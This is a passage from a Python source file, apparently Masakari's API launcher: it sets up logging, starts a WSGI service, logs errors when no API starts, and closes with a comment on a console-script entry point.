    logging.setup(CONF, "masakari")
    log = logging.getLogger(__name__)

    launcher = service.process_launcher()
    started = 0

    try:
        server = service.WSGIService("masakari_api", use_ssl=CONF.use_ssl)
        launcher.launch_service(server, workers=server.workers or 1)
        started += 1
    except exception.PasteAppNotFound as ex:
        log.warning(
            _LW("%s. ``enabled_apis`` includes bad values. "
                "Fix to remove this warning."), six.text_type(ex))

    if started == 0:
        log.error(_LE('No APIs were started. '
                      'Check the enabled_apis config option.'))
        sys.exit(1)

    launcher.wait()
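
# ----------------------------------------------------------------------------
# Note: this module is normally exposed as a console-script entry point; the
# setup.cfg stanza below is an assumption about the packaging, shown only for
# illustration:
#
#     [entry_points]
#     console_scripts =
#         masakari-api = masakari.cmd.api:main
#
# The guard below simply allows ad-hoc execution as a plain script.
# ----------------------------------------------------------------------------
if __name__ == '__main__':
    main()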
| 28.327586 | 77 | 0.688984 |